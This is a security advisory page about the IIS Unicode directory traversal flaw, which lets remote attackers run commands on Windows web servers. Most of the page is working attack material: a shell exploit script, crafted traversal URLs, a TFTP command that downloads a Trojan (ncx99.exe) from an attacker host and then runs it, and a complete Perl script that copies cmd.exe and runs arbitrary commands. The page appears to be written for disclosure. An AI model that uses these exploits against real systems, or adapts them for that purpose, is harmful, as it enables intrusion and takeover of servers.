|
Brought to you by:
Suppliers of:
|
|
|
| |
| As we reported in our previous article: Web Server Folder Traversal vulnerability, IIS suffers from a security vulnerability that allows remote attackers to execute arbitrary commands. Additional details have come to our attention, and are presented in the following advisory. |
| |
Credit:
The information has been provided by Marco, Zoa_Chien and Nsfocus Security Team.
|
| |
MSADC "bypass"
By supplying /msadc in the URL, it is possible to "escape" from the web root directory, and reach other directories that are not usually accessible through normal HTTP requests.
Exploit:
---runaway.sh----
#!/bin/sh
lynx -dump
http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7
--------------
Example:
./runaway.sh www.example.com dir c:\\ (<- note the double backslash).
Using TFTP to "complete the circle"
By using tftp.exe (a utility that comes with WinNT and Win2K), it is possible to complete the attack and compromise the underlying operating system. There is nothing new about TFTP, but by using a TFTPD Trivial FTP daemon, it is possible to use the command execution vulnerability in order to download a Trojan file and then execute it - thus gaining further privileges.
Exploit:
Sending this URL:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
Will download the file 'ncx99.exe'.
After that, the Trojan can be executed by requesting the URL:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe
CMD1.EXE copying & bypassing
By copying the "cmd.exe" into any other filename (for example: "cmd1.exe") you can bypass IIS's restriction on redirection of output.
Example:
(1) Copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe":
http://www.example.com/scripts/..%c1%9c../winnt/system32/cmd.exe? /c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
(2) Run "cmd1.exe /c echo abc >aaa & dir & type aaa "
http://www.example.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
Complete exploit (for "cmd1.exe" bypass):
#!/usr/bin/perl
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to security@nsfocus.com for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
# roelof@sensepost.com http://www.sensepost.com
use Socket;
# --------------init
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
# --------------test if cmd has been copied:
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
print "Sensepost.exe not found - Copying CMD...\n";
$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /copied/ )) {$failed2=0;}
}
if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
}
# ------------ we can assume that the cmd.exe is copied from here..
$command=@ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
|
|
|
|
|
